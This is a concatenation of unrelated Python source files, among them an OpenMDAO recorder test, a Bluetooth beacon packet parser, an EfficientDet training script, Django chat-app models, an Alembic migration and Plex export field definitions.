prob.root.add('C1', ABCDArrayComp(size))
prob.root.connect('G1.P1.x', 'C1.a')
prob.root.connect('G1.P2.x', 'C1.b')
prob.root.nl_solver.add_recorder(self.recorder)
self.recorder.options['record_params'] = True
self.recorder.options['record_resids'] = True
prob.setup(check=False)
t0, t1 = run(prob)
prob.cleanup()
if MPI:
coord = [MPI.COMM_WORLD.rank, 'Driver', (1, ), "root", (1,)]
else:
coord = [0, 'Driver', (1, ), "root", (1,)]
expected_params = [
("C1.a", [1.0, 1.0, 1.0]),
("C1.b", [2.0, 2.0, 2.0]),
]
expected_unknowns = [
("G1.P1.x", np.array([1.0, 1.0, 1.0])),
("G1.P2.x", np.array([2.0, 2.0, 2.0])),
("C1.c", np.array([3.0, 3.0, 3.0])),
("C1.d", np.array([-1.0, -1.0, -1.0])),
("C1.out_string", "_C1"),
("C1.out_list", [1.5]),
]
expected_resids = [
("G1.P1.x", np.array([0.0, 0.0, 0.0])),
("G1.P2.x", np.array([0.0, 0.0, 0.0])),
("C1.c", np.array([0.0, 0.0, 0.0])),
("C1.d", np.array([0.0, 0.0, 0.0])),
("C1.out_string", ""),
("C1.out_list", []),
]
self.assertIterationDataRecorded(((coord, (t0, t1), expected_params, expected_unknowns, expected_resids),), self.eps, prob.root)
def test_driver_records_metadata(self):
size = 3
prob = Problem(Group(), impl=impl)
G1 = prob.root.add('G1', ParallelGroup())
G1.add('P1', IndepVarComp('x', np.ones(size, float) * 1.0))
G1.add('P2', IndepVarComp('x', np.ones(size, float) * 2.0))
prob.root.add('C1', ABCDArrayComp(size))
prob.root.connect('G1.P1.x', 'C1.a')
prob.root.connect('G1.P2.x', 'C1.b')
prob.driver.add_recorder(self.recorder)
self.recorder.options['record_metadata'] = True
prob.setup(check=False)
prob.cleanup()
expected = (
list(prob.root.params.iteritems()),
list(prob.root.unknowns.iteritems()),
list(prob.root.resids.iteritems()),
)
self.assertMetadataRecorded(expected)
def test_driver_records_model_viewer_data(self):
size = 3
prob = Problem(Group(), impl=impl)
G1 = prob.root.add('G1', ParallelGroup())
G1.add('P1', IndepVarComp('x', np.ones(size, float) * 1.0))
G1.add('P2', IndepVarComp('x', np.ones(size, float) * 2.0))
prob.root.add('C1', ABCDArrayComp(size))
prob.root.connect('G1.P1.x', 'C1.a')
prob.root.connect('G1.P2.x', 'C1.b')
prob.driver.add_recorder(self.recorder)
self.recorder.options['record_metadata'] = True
prob.setup(check=False)
prob.cleanup()
# do some basic tests to make sure the model_viewer_data was recorded correctly
if self.comm.rank == 0:
db = SqliteDict(self.filename, self.tablename_metadata)
model_viewer_data = db['model_viewer_data']
tr = model_viewer_data['tree']
self.assertEqual(set(['name', 'type', 'subsystem_type', 'children']), set(tr.keys()))
names = []
for ch1 in tr['children']:
# each is an ordereddict
names.append(ch1["name"] )
for ch2 in ch1["children"]:
names.append(ch2["name"] )
if "children" in ch2:
for ch3 in ch2["children"]:
names.append(ch3["name"] )
expected_names = ['G1', 'P1', 'x', 'P2', 'x', 'C1', 'a', 'b',
'in_string', 'in_list', 'c', 'd', 'out_string', 'out_list']
self.assertEqual( sorted(expected_names), sorted(names))
cl = model_viewer_data['connections_list']
for c in cl:
self.assertEqual(set(['src', 'tgt']), set(c.keys()))
db.close()
def test_driver_doesnt_records_metadata(self):
size = 3
prob = Problem(Group(), impl=impl)
G1 = prob.root.add('G1', ParallelGroup())
G1.add('P1', IndepVarComp('x', np.ones(size, float) * 1.0))
G1.add('P2', IndepVarComp('x', np.ones(size, float) * 2.0))
prob.root.add('C1', ABCDArrayComp(size))
prob.root.connect('G1.P1.x', 'C1.a')
prob.root.connect('G1.P2.x', 'C1.b')
prob.driver.add_recorder(self.recorder)
self.recorder.options['record_metadata'] = False
prob.setup(check=False)
prob.cleanup()
self.assertMetadataRecorded(None)
if __name__ == "__main__":
from openmdao.test.mpi_util import mpirun_tests
mpirun_tests()
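# Note (assumed invocation): these tests target the classic OpenMDAO 1.x API with N_PROCS = 2,
# so under MPI they would typically be launched with something like
#   mpirun -np 2 python <this_test_file>.py
# and fall back to a plain serial run when MPI is not available.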
|
import binascii
import struct
from enum import Enum
from collections import namedtuple
from typing import List, Dict, Tuple
from src.utils import *
ibeacon_base_format = '!16s2s2sb'
ibeacon_base_vars = ['UUID', 'Major', 'Minor', 'RSSI']
eddystone_base_format = '!10s6sb'
eddystone_base_vars = ['Namespace', 'InstanceID', 'RSSI']
types = namedtuple('BeaconTypesInfo', ['fmt', 'assign_vars'])
class ParsingError(Exception):
""" Something goes wrong in parsing """
class UnknownType(ParsingError):
""" Beacon type is undefined """
def __init__(self, flag):
self.message = f'Unknown beacon type ({flag})'
super().__init__(self.message)
class InsufficientPacketSize(ParsingError):
""" Packet size insufficiency """
def __init__(self, size, required_size):
self.message = f'Have {size//2} bytes but required >={required_size//2} bytes'
super().__init__(self.message)
class BeaconTypes(Enum):
iBeacon_RSSI = types(ibeacon_base_format, ibeacon_base_vars)
iBeacon_RSSI_BV = types(ibeacon_base_format+'H', ibeacon_base_vars+['voltage'])
iBeacon_RSSI_BV_TEMP = types(ibeacon_base_format+'HH', ibeacon_base_vars+['voltage', 'temp'])
Eddystone_RSSI = types(eddystone_base_format, eddystone_base_vars)
Eddystone_RSSI_BV = types(eddystone_base_format+'H', eddystone_base_vars+['voltage'])
Eddystone_RSSI_BV_TEMP = types(eddystone_base_format+'HH', eddystone_base_vars+['voltage', 'temp'])
class BeaconParser:
@staticmethod
def parse(packet: bytes) -> List[Dict]:
all_data = []
packet, data_part = extract_ubyte(packet)
while len(packet)>0:
packet, flag = extract_ubyte(packet)
beacon_type = BeaconParser.define_beacon_type(flag)
fmt_size = struct.calcsize(beacon_type.value.fmt)*2
if len(packet)<fmt_size:
raise InsufficientPacketSize(len(packet), fmt_size)
packet, data = BeaconParser.assign_to_vars(packet, beacon_type)
all_data.append(data)
return all_data
@staticmethod
    def assign_to_vars(packet: bytes, btype: BeaconTypes) -> Tuple[bytes, Dict]:
type_info = btype.value
size = struct.calcsize(type_info.fmt)
p = binascii.a2b_hex(packet[:size*2])
unpacked = struct.unpack(type_info.fmt, p)
data = []
for var in unpacked:
if isinstance(var, bytes):
data.append(binascii.hexlify(var).decode('ascii'))
else:
data.append(var)
data = dict(zip(type_info.assign_vars, data))
data["BeaconType"] = btype.name
return packet[size*2:], data
@staticmethod
    def define_beacon_type(flag: int) -> BeaconTypes:
if flag == 33:
beacon_type = BeaconTypes.iBeacon_RSSI
elif flag == 35:
beacon_type = BeaconTypes.iBeacon_RSSI_BV
elif flag == 39:
beacon_type = BeaconTypes.iBeacon_RSSI_BV_TEMP
elif flag == 1:
beacon_type = BeaconTypes.Eddystone_RSSI
elif flag == 3:
beacon_type = BeaconTypes.Eddystone_RSSI_BV
elif flag == 7:
beacon_type = BeaconTypes.Eddystone_RSSI_BV_TEMP
else:
raise UnknownType(flag)
return beacon_type
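# Wire format implied by the parser above (hex-encoded ASCII): a leading one-byte field,
# then for each beacon a one-byte type flag followed by that type's struct payload.
# Flag values: 33 / 35 / 39 -> iBeacon (RSSI / +battery voltage / +temperature),
#               1 /  3 /  7 -> Eddystone (RSSI / +battery voltage / +temperature).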
|
from __future__ import print_function
# read a pedigree and store info in a dictionary
class Pedigree:
def __init__(self, ped, samples):
# dict of list of samples in family
self.samples_by_family = {}
# dict of family by sample
self.families_by_sample = {}
# all info from ped file
self.samples = {}
for line in ped:
if line[0] == '#' or line == '\n':
continue
try:
fam, iid, fid, mid = line.split('\t')[0:4]
except ValueError:
print('Line in pedigree incorrectly formatted:\n"{}"\n'.format(line))
continue
if iid not in samples:
continue
if fam in self.samples_by_family:
self.samples_by_family[fam].append(iid)
else:
self.samples_by_family[fam] = [iid]
self.families_by_sample[iid] = fam
self.samples[iid] = (fam, iid, fid, mid)
for s in samples:
if s not in self.samples:
print('Warning: sample {} not in pedigree\n'.format(s))
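# Expected pedigree line format (as consumed above): tab-separated columns whose first four
# fields are family ID, individual ID, father ID, and mother ID; '#' comment lines and blank
# lines are skipped, and samples absent from the `samples` argument are ignored.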
|
# For statistic operation
from library.math_tool_box import StatMaker
# for random number generator
from library.linear_congruedntial_generator import random_number_gen
# For measuring elapsed time
from library.measure_time_performance import measure_elapsed_time
### 1. Generate 5 random numbers
random_number_list = random_number_gen( length =5 )
print("\n 5 random numbers are generated as below:")
print( random_number_list )
print()
### 2. Generate N random numbers between -1 and 1, and calculate their average and standard deviation.
# Note: N = 10^1, 10^2, 10^3, 10^4, 10^5
### 3. Measure elapsed time of random number generation on each iteration.
### 4. Design and implement a random number generator
# Note: This item is completed, and it is saved in library.linear_congruedntial_generator
size_array = []
output_array = []
for n in range( 1, 6 ):
size_array.append( 10**n )
for i in range( 0, 5 ):
length = size_array[i]
output_array.append( measure_elapsed_time(random_number_gen, length, -1, 1, True ) )
statistic_info = StatMaker( output_array[i] )
print("Average of list with length {0} = {1}".format( length, statistic_info.get_avg() ) )
print("Standard deviation of list with length {0} = {1}".format( length, statistic_info.get_std() ) )
print()
'''
Example output:
### 1. Generate 5 random numbers
5 random numbers are generated as below:
[1255046, 452783350, 1364012331, 390612681, 358303891]
### 2. Generate N random numbers between -1 and 1, and calculates their average and standard deviation.
N = 10^1, 10^2, 10^3, 10^4, 10^5
### 3. Measure elapsed time of random number generation on each iteration.
### 4. Design and implemnet a random number generator
This item is completed, and it is saved in library.linear_congruedntial_generator
random_number_gen took 0.031289000 ms to run
Average of list with length 10 = 0.12344294369541378
Standard deviation of list with length 10 = 0.6970713923615578
random_number_gen took 0.168960000 ms to run
Average of list with length 100 = 0.04805143085126898
Standard deviation of list with length 100 = 0.5999758690220189
random_number_gen took 1.527465000 ms to run
Average of list with length 1000 = 0.0023875394355389636
Standard deviation of list with length 1000 = 0.5877759267632492
random_number_gen took 15.660929000 ms to run
Average of list with length 10000 = -0.004161540137474938
Standard deviation of list with length 10000 = 0.5781747512114019
random_number_gen took 153.725024000 ms to run
Average of list with length 100000 = -0.0035780554856993775
Standard deviation of list with length 100000 = 0.5787522721242679
''' |
# add common library
from logger import logger, log
logger.setup('./logs', name='efficientDet-d5-cutmix-sgd')
from lib import *
from config import config
from dataset import WheatDataset, get_train_transforms, get_valid_transforms
from utils import seed_everything, read_csv, kfold
from trainer import Trainner, collate_fn
from efficientdet_master.effdet import get_efficientdet_config, EfficientDet, DetBenchTrain
from efficientdet_master.effdet.efficientdet import HeadNet
def get_net():
# config = get_efficientdet_config('tf_efficientdet_d7')
# net = EfficientDet(config, pretrained_backbone=False)
# checkpoint = torch.load('./input/efficientdet/tf_efficientdet_d7-f05bf714.pth') #D7
net_config = get_efficientdet_config('tf_efficientdet_d5')
net = EfficientDet(net_config, pretrained_backbone=config.use_pretrained)
checkpoint = torch.load('./input/efficientdet/tf_efficientdet_d5-ef44aea8.pth') #D5
net.load_state_dict(checkpoint)
net_config.num_classes = 1
net_config.image_size = 1024
net.class_net = HeadNet(net_config, num_outputs=net_config.num_classes, norm_kwargs=dict(eps=.001, momentum=.01))
return DetBenchTrain(net, net_config)
def run_training(fold_number):
seed_everything(config.seed)
device = torch.device(config.device)
# read csv
data_frame = read_csv(config.train_csv)
# create stratify kfold
df_folds = kfold(data_frame)
# create dataset
train_dataset = WheatDataset(
image_ids=df_folds[df_folds['fold'] != fold_number].index.values,
data_frame=data_frame,
transforms=get_train_transforms(),
test=False,
)
validation_dataset = WheatDataset(
image_ids=df_folds[df_folds['fold'] == fold_number].index.values,
data_frame=data_frame,
transforms=get_valid_transforms(),
test=True,
)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=config.batch_size,
sampler=RandomSampler(train_dataset),
pin_memory=False,
drop_last=True,
num_workers=config.num_workers,
collate_fn=collate_fn,
)
val_loader = torch.utils.data.DataLoader(
validation_dataset,
batch_size=config.batch_size,
num_workers=config.num_workers,
shuffle=False,
sampler=SequentialSampler(validation_dataset),
pin_memory=False,
collate_fn=collate_fn,
)
# model
model = get_net()
if len(config.gpu_ids) > 1:
model = nn.DataParallel(model)
model.to(device)
# training
trainer = Trainner(model=model, config=config, fold_number=fold_number)
trainer.train(train_loader, val_loader)
if __name__ == '__main__':
#train 5 folds
for i in range(5):
log.info(f'Fold {i}')
run_training(fold_number=i)
|
from dataclasses import dataclass
from typing import Any, Callable, Dict, List, TypeVar
import torch
from torch import Tensor
import pytorch_lightning as pl
@dataclass(eq=False)  # eq=False keeps identity hashing so Node instances can be used as dict keys
class Node:
size: torch.Size
name: str = None
pooling_function: Callable[[Tensor], Tensor] = torch.sum
activation_function: Callable[[Tensor], Tensor] = lambda x: x
initialization_function: Callable[[torch.Size], Tensor] = torch.zeros
@dataclass
class Connection:
srcs: List[Node]
dsts: List[Node]
fn: Callable[[List[Tensor]], List[Tensor]]
@property
def trainable_params(self) -> List[Tensor]:
if hasattr(self.fn, 'parameters'):
return self.fn.parameters()
else:
return []
class MPNet(pl.LightningModule):  # fields declared below are assigned explicitly in __init__
nodes: List[Node]
connections: List[Connection]
# TODO store the state optimizer in the state dict
state_optimizer_fn: Callable[[], torch.optim.Optimizer]
    # ptl stores the model's optimizer in `.optimizer()`
    # parameter_optimizer: torch.optim.Optimizer
@property
def parameters(self) -> List[Tensor]:
        return [param for connection in self.connections
                for param in connection.trainable_params]
def __init__(self, nodes: List[Node], connections: List[Connection]):
super().__init__()
self.nodes = nodes
self.connections = connections
# TODO: implement pl.LightningModule.forward and other methods
@property
def _initial_state(self) -> Dict[Node, Tensor]:
return {node: node.initialization_function(node.size)
for node in self.nodes}
def _update(self, vals: Dict[Node, Tensor]):
# clear gradients
# forward pass
vals = self._forward(vals)
# backward pass on state variables
for node in self.nodes:
# TODO
vals[node]._grad += vals[node].backward()
# backward pass on trainable parameters
def _forward(self, vals: Dict[Node, Tensor]) -> Dict[Node, Tensor]:
# compute buckets
buckets = {node: [] for node in self.nodes}
for connection in self.connections:
inputs = [vals[src] for src in connection.srcs]
outputs = connection.fn(inputs)
for output, dst in zip(outputs, connection.dsts):
buckets[dst].append(output)
# pool bucket values and apply activation function
for node in self.nodes:
vals[node] = node.activation_function(
node.pooling_function(buckets[node]))
return vals
|
from django.db import models
from django.conf import settings
import time
import json
from datetime import datetime
import hashlib
import uuid
from wsgiref.handlers import format_date_time
from django.core.urlresolvers import reverse
from authz_group.models import Crowd
class Thread(models.Model):
name = models.CharField(max_length=100, unique=True, db_column='name')
description = models.CharField(max_length=1000, db_column='description')
is_private = models.NullBooleanField(db_column='is_private', null=True)
is_deleted = models.NullBooleanField(db_column='is_deleted', null=True)
has_groups = models.BooleanField(db_column='has_groups')
def person_has_access(self, person):
# Private threads
if self.is_private:
person_ids = self.name.split("|")
for pid in person_ids:
if int(pid) == int(person.person_id):
return True
return False
# thread managers
if self.is_manager(person):
return True
# Legacy auth
try:
auth_entry = AuthList.objects.get(thread = self, person = person)
if auth_entry.pk:
return True
except AuthList.DoesNotExist:
pass
try:
has_auth_entry = AuthList.objects.get(thread = self)
if has_auth_entry.pk:
return False
except AuthList.DoesNotExist:
pass
# Group auth
try:
group_links = GroupLink.objects.filter(thread = self)
for link in group_links:
crowd = Crowd.objects.get(pk = link.group_id)
if crowd.is_member(person.login_name):
return True
if self.has_groups:
return False
except GroupLink.DoesNotExist:
pass
return True
def is_manager(self, person):
try:
manager_entry = ThreadManager.objects.get(thread = self, person = person)
if manager_entry.pk:
return True
except ThreadManager.DoesNotExist:
return False
def get_other_person(self, person):
if not self.is_private:
raise Exception("No other person for non-private thread")
id1, id2 = self.name.split('|')
if id1 == id2:
return person
person1, person2 = Person.objects.filter(person_id__in = [id1, id2])
if person1.person_id == person.person_id:
return person2
return person1
def json_data(self, person=None):
data = {
"id": self.pk,
"name": self.name,
"description": self.description,
"is_private": self.is_private,
"has_groups": self.has_groups,
"managers": []
}
if self.is_private and person:
person_ids = self.name.split("|")
pid = None
if int(person_ids[0]) == person.pk:
pid = person_ids[1]
else:
pid = person_ids[0]
other_person = Person.objects.get(person_id = pid)
data["login_name"] = other_person.login_name
managers = ThreadManager.objects.filter(thread = self)
for manager in managers:
data["managers"].append(manager.json_data())
return data
class Meta:
db_table = 'thread'
class Person(models.Model):
person_id = models.AutoField(primary_key = True, db_column = 'person_id')
login_name = models.TextField(max_length=128, db_column='login_name')
name = models.TextField(max_length=255, db_column='name')
date_modified = models.DateTimeField(db_column='date_modified')
def json_data(self):
data = {
"id": self.person_id,
"login_name": self.login_name,
"name": self.name,
"attributes": {},
}
attributes = PersonAttribute.objects.filter(person=self)
for attribute in attributes:
data["attributes"][attribute.attribute] = attribute.value
if attribute.attribute == "yarn_avatar_id":
hashval = hashlib.md5("%s-%s" % ( self.pk, settings.SECRET_KEY)).hexdigest()
data["avatar_url"] = reverse('yarn.views.view_avatar', kwargs = { 'person_id': self.pk, 'verify_hash': hashval })
return data
def save(self, *args, **kwargs):
self.date_modified = datetime.now()
super(Person, self).save(*args, **kwargs)
class Meta:
db_table = 'Person'
class PersonAttribute(models.Model):
id = models.AutoField(db_column='person_attribute_id', primary_key=True)
attribute = models.CharField(max_length = 255, db_column='attribute')
value = models.TextField(db_column='value')
person = models.ForeignKey(Person, db_column='person_id')
class Meta:
db_table = 'PersonAttribute'
class AuthList(models.Model):
""" Legacy access controls - should use group access now """
person = models.ForeignKey(Person)
thread = models.ForeignKey(Thread)
class Meta:
db_table = 'auth_list'
unique_together = ('thread', 'person')
class GroupLink(models.Model):
thread = models.ForeignKey(Thread)
group_id = models.IntegerField(db_column = 'group_id')
class Meta:
db_table = 'group_auth'
unique_together = ('thread', 'group_id')
class ThreadManager(models.Model):
person = models.ForeignKey(Person)
thread = models.ForeignKey(Thread)
def json_data(self):
return self.person.json_data()
class Meta:
db_table = 'thread_manager'
unique_together = ('thread', 'person')
class ThreadNotification(models.Model):
thread = models.ForeignKey(Thread)
person = models.ForeignKey(Person)
is_new = models.BooleanField(db_column = "is_new")
def json_data(self, person):
other_person = self.thread.get_other_person(person)
return {
"login_name": other_person.login_name,
"thread_id": self.thread.pk,
}
class Meta:
db_table = 'thread_notifications'
unique_together = ('thread', 'person')
class Artifact(models.Model):
description = models.TextField(db_column='description')
timestamp = models.DateTimeField(db_column='timestamp')
artifact_type = models.CharField(max_length=128, db_column='type', null=True)
thread = models.ForeignKey(Thread, db_column='thread_id')
person = models.ForeignKey(Person, db_column='person_id')
bot = models.TextField(db_column='bot')
def json_data(self):
data = {
"id": self.pk,
"description": self.description,
"type": self.artifact_type,
"thread_id": self.thread.pk,
"timestamp": None,
"bot": self.bot
}
if self.timestamp:
data["timestamp"] = format_date_time(time.mktime(self.timestamp.timetuple()))
if self.artifact_type == "file":
hashval = hashlib.md5("%s-%s-%s" % ( self.thread.pk, self.description, settings.SECRET_KEY)).hexdigest()
data["download_url"] = reverse('yarn.views.download_file', kwargs = {'thread_id': self.thread.pk, 'file_id': self.description, 'verify_hash': hashval })
sol_file = SolsticeFile.objects.get(pk = self.description)
data["file_name"] = sol_file.name
if sol_file.is_image():
data["is_image"] = True
data["thumbnail_url"] = reverse('yarn.views.thumbnail_file', kwargs = {'thread_id': self.thread.pk, 'file_id': self.description, 'verify_hash': hashval })
if hasattr(self, 'person'):
data["author"] = self.person.json_data()
return data
class Meta:
db_table = 'artifact'
class User(models.Model):
thread = models.ForeignKey(Thread, db_column = 'thread_id')
person = models.ForeignKey(Person, db_column = 'person_id')
is_online = models.BooleanField(db_column = 'is_online')
last_message_id = models.IntegerField(db_column = 'last_message_id')
last_online = models.DateTimeField(db_column='last_online')
class Meta:
db_table = 'user'
unique_together = ('thread', 'person')
class SolsticeFile(models.Model):
file_id = models.AutoField(db_column='file_id', primary_key=True)
person = models.ForeignKey(Person, db_column='person_id')
name = models.CharField(max_length=255, db_column='name')
content_type = models.CharField(max_length=255, db_column='content_type')
content_length = models.IntegerField(db_column='content_length')
creation_date = models.DateTimeField(db_column='creation_date')
modification_date = models.DateTimeField(db_column='modification_date')
filestore_id = models.IntegerField(db_column='filestore_id')
def is_image(self):
if self.content_type in ['image/jpeg', 'image/png', 'image/gif']:
return True
return False
def path_to_file(self):
if not hasattr(settings, "SOLSTICE_FILE_ROOT"):
raise Exception("Need to have a defined SOLSTICE_FILE_ROOT path in settings, where files will live")
md5val = hashlib.md5("%i" % self.person.pk).hexdigest()[:3]
return "%s/%s/%s/%s" % (settings.SOLSTICE_FILE_ROOT, md5val, self.person.pk, self.pk)
class Meta:
db_table = 'File'
class SolsticeFileAttribute(models.Model):
attribute_id = models.AutoField(db_column='file_attribute_id', primary_key=True)
solstice_file = models.ForeignKey(SolsticeFile, db_column='file_id')
attribute = models.CharField(max_length=255, db_column='attribute')
value = models.TextField(db_column='value')
class Meta:
db_table = 'FileAttribute'
class FavoriteThreads(models.Model):
person = models.ForeignKey(Person, unique = True)
threads = models.TextField()
def favorite_id_list(self):
return json.loads(self.threads)
def set_favorite_id_list(self, ids):
self.threads = json.dumps(ids)
class WebsocketAuthToken(models.Model):
person = models.ForeignKey(Person)
secret = models.CharField(max_length=255)
date_created = models.DateTimeField()
def save(self, *args, **kwargs):
self.secret = str(uuid.uuid4())
self.date_created = datetime.now()
super(WebsocketAuthToken, self).save(*args, **kwargs)
def get_token(self):
return hashlib.md5("%s-%s" % (self.person.pk, self.secret)).hexdigest()
def validate_token(self, test_token, login_name):
person = Person.objects.get(login_name = login_name)
tokens = WebsocketAuthToken.objects.filter(person = person)
now = datetime.now()
for token in tokens:
if token.get_token() == test_token:
delta = (now - token.date_created).seconds
# Only allow 5 minute old tokens
if delta < (5 * 60):
token.delete()
return True
return False
|
"""Change parcel attachments to parcel map
Revision ID: 98db6b34d1a3
Revises: fc8dd9d7a9d7
Create Date: 2019-11-15 07:38:48.934387
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '98db6b34d1a3'
down_revision = 'fc8dd9d7a9d7'
def upgrade():
op.drop_table('parcelattachment')
op.add_column(
'parcel',
sa.Column(
'map_data',
sa.LargeBinary(length=10485760),
nullable=True
)
)
op.add_column(
'parcel',
sa.Column('map_mimetype', sa.String(length=100), nullable=True)
)
op.add_column(
'parcel',
sa.Column('map_size', sa.String(length=20), nullable=True)
)
def downgrade():
op.drop_column('parcel', 'map_size')
op.drop_column('parcel', 'map_mimetype')
op.drop_column('parcel', 'map_data')
op.create_table(
'parcelattachment',
sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column(
'organization_id', sa.INTEGER(), autoincrement=False,
nullable=False
),
sa.Column(
'parcel_id', sa.INTEGER(), autoincrement=False, nullable=False
),
sa.Column(
'name', sa.VARCHAR(length=100), autoincrement=False, nullable=True
),
sa.Column(
'mimetype', sa.VARCHAR(length=100), autoincrement=False,
nullable=True
),
sa.Column(
'size', sa.VARCHAR(length=20), autoincrement=False, nullable=True
),
sa.Column(
'data', postgresql.BYTEA(), autoincrement=False, nullable=True
),
sa.ForeignKeyConstraint(
['parcel_id'],
['parcel.id'],
name='parcelattachment_parcel_id_fkey'
),
sa.PrimaryKeyConstraint('id', name='parcelattachment_pkey')
)
|
#########################################################################
# Helper file for ExportTools
# Written by dane22 on the Plex Forums, UKDTOM on GitHub
#
# This one contains the valid fields and attributes for movies
#
# To disable a field not needed, simply put a # sign in front of the line,
# and it'll be omitted.
# After above, a PMS restart is sadly req. though
# Note though, that this will be overwritten, if/when this plugin is updated
#
# If level has the number 666 in it, a column named 'PMS Media Path' will
# automatically be added to the end
#########################################################################
# Fields that contains a timestamp and should return a date
dateTimeFields = ['addedAt', 'updatedAt', 'lastViewedAt']
# Fields that contains a timestamp and should return a time
timeFields = ['duration', 'startTimeOffset', 'endTimeOffset']
# Levels that only req. a single call towards PMS
singleCall = ['Level 1', 'Level 2', 'PlayCount 1']
# Levels for PlayCount
playCountCall = ['PlayCount 1']
# Define rows and element name for level 1 (Single call)
Level_1 = [
('Media ID',
'@ratingKey'),
('Title',
'@title'),
('Sort title',
'@titleSort'),
('Studio',
'@studio'),
('Content Rating',
'@contentRating'),
('Year',
'@year'),
('Rating',
'@rating'),
('Summary',
'@summary'),
('Genres',
'Genre/@tag')
]
# Define rows and element name for level 2 (Single Call)
Level_2 = [
('View Count',
'@viewCount'),
('Last Viewed at',
'@lastViewedAt'),
('Tagline',
'@tagline'),
('Release Date',
'@originallyAvailableAt'),
('Writers',
'Writer/@tag'),
('Country',
'Country/@tag'),
('Duration',
'@duration'),
('Directors',
'Director/@tag'),
('Roles',
'Role/@tag'),
('Audience Rating',
'@audienceRating'),
('User Rating',
'@userRating')
]
# Define rows and element name for level 3 (One call pr. movie)
Level_3 = [
('Labels',
'Label/@tag'),
('Locked Fields',
'Field/@name'),
('Extras',
'Extras/@size'),
('Extras-behindthescenes',
'Extras/Video[@subtype="behindTheScenes"]'),
('Extras-deleted',
'Extras/Video[@subtype="deleted"]'),
('Extras-featurette',
'Extras/Video[@subtype="featurette"]'),
('Extras-interview',
'Extras/Video[@subtype="interview"]'),
('Extras-scene',
'Extras/Video[@subtype="scene"]'),
('Extras-short',
'Extras/Video[@subtype="short"]'),
('Extras-trailer',
'Extras/Video[@subtype="trailer"]'),
('Collections',
'Collection/@tag'),
('Original Title',
'@originalTitle'),
('Added',
'@addedAt'),
('Updated',
'@updatedAt'),
('Audio Languages',
'Media/Part/Stream[@streamType=2]/@languageCode'),
('Audio Title',
'Media/Part/Stream[@streamType=2]/@title'),
('Subtitle Languages',
'Media/Part/Stream[@streamType=3]/@languageCode'),
('Subtitle Title',
'Media/Part/Stream[@streamType=3]/@title'),
('Subtitle Codec',
'Media/Part/Stream[@streamType=3]/@codec'),
('Subtitle Forced',
'Media/Part/Stream[@streamType=3]/@forced'),
('Accessible',
'Media/Part/@accessible'),
('Exists',
'Media/Part/@exists'),
('MetaDB Link',
'@guid'),
('MetaData Language',
'@guid'),
('IMDB ID',
'//Guid[starts-with(@id, "imdb")]/@id'),
('IMDB Link',
'//Guid[starts-with(@id, "imdb")]/@id'),
('TMDB ID',
'//Guid[starts-with(@id, "tmdb")]/@id'),
('TMDB Link',
'//Guid[starts-with(@id, "tmdb")]/@id'),
('Poster url',
'@thumb'),
('Art url',
'@art'),
('Chapter Source',
'@chapterSource'),
('Chapter Title',
'Chapter/@tag'),
('Chapter Count',
'Chapter/@index')
]
# Define rows and element name for level 4 (One call pr. movie)
Level_4 = [
('Video Resolution',
'Media/@videoResolution'),
('Bitrate',
'Media/@bitrate'),
('Width',
'Media/@width'),
('Height',
'Media/@height'),
('Aspect Ratio',
'Media/@aspectRatio'),
('Audio Channels',
'Media/@audioChannels'),
('Audio Codec',
'Media/@audioCodec'),
('Video Codec',
'Media/@videoCodec'),
('Container',
'Media/@container'),
('Video FrameRate',
'Media/@videoFrameRate')
]
# Define rows and element name for level 5 (Part info) (One call pr. movie)
Level_5 = [
('Part File Combined',
'Media/Part/@file'),
('Part File',
'Media/Part/@file'),
('Part File Path',
'Media/Part/@file'),
('Part Size',
'Media/Part/@size'),
('Part Size as Bytes',
'Media/Part/@size'),
('Part Indexed',
'Media/Part/@indexes'),
('Part Duration',
'Media/Part/@duration'),
('Part Container',
'Media/Part/@container'),
('Part Optimized for Streaming',
'Media/Part/@optimizedForStreaming'),
('Part Deep Analysis Version',
'Media/Part/@deepAnalysisVersion'),
('Required Bandwidths',
'Media/Part/@requiredBandwidths')
]
# Define rows and element name for level 6 (Video Stream Info)
# (One call pr. movie)
Level_6 = [
('Video Stream Title',
'Media/Part/Stream[@streamType=1]/@title'),
('Video Stream Default',
'Media/Part/Stream[@streamType=1]/@default'),
('Video Stream Index',
'Media/Part/Stream[@streamType=1]/@index'),
('Video Stream Pixel Format',
'Media/Part/Stream[@streamType=1]/@pixelFormat'),
('Video Stream Profile',
'Media/Part/Stream[@streamType=1]/@profile'),
('Video Stream Ref Frames',
'Media/Part/Stream[@streamType=1]/@refFrames'),
('Video Stream Scan Type',
'Media/Part/Stream[@streamType=1]/@scanType'),
('Video Stream Stream Identifier',
'Media/Part/Stream[@streamType=1]/@streamIdentifier'),
('Video Stream Width',
'Media/Part/Stream[@streamType=1]/@width'),
('Video Stream Pixel Aspect Ratio',
'Media/Part/Stream[@streamType=1]/@pixelAspectRatio'),
('Video Stream Height',
'Media/Part/Stream[@streamType=1]/@height'),
('Video Stream Has Scaling Matrix',
'Media/Part/Stream[@streamType=1]/@hasScalingMatrix'),
('Video Stream Frame Rate Mode',
'Media/Part/Stream[@streamType=1]/@frameRateMode'),
('Video Stream Frame Rate',
'Media/Part/Stream[@streamType=1]/@frameRate'),
('Video Stream Codec',
'Media/Part/Stream[@streamType=1]/@codec'),
('Video Stream Codec ID',
'Media/Part/Stream[@streamType=1]/@codecID'),
('Video Stream Chroma Sub Sampling',
'Media/Part/Stream[@streamType=1]/@chromaSubsampling'),
('Video Stream Color Primaries',
'Media/Part/Stream[@streamType=1]/@colorPrimaries'),
('Video Stream Color Range',
'Media/Part/Stream[@streamType=1]/@colorRange'),
('Video Stream Color Space',
'Media/Part/Stream[@streamType=1]/@colorSpace'),
('Video Stream Color Trc',
'Media/Part/Stream[@streamType=1]/@colorTrc'),
('Video Stream Cabac',
'Media/Part/Stream[@streamType=1]/@cabac'),
('Video Stream Anamorphic',
'Media/Part/Stream[@streamType=1]/@anamorphic'),
('Video Stream Language Code',
'Media/Part/Stream[@streamType=1]/@languageCode'),
('Video Stream Language',
'Media/Part/Stream[@streamType=1]/@language'),
('Video Stream Bitrate',
'Media/Part/Stream[@streamType=1]/@bitrate'),
('Video Stream Bit Depth',
'Media/Part/Stream[@streamType=1]/@bitDepth'),
('Video Stream Duration',
'Media/Part/Stream[@streamType=1]/@duration'),
('Video Stream Required Bandwidths',
'Media/Part/Stream[@streamType=1]/@requiredBandwidths'),
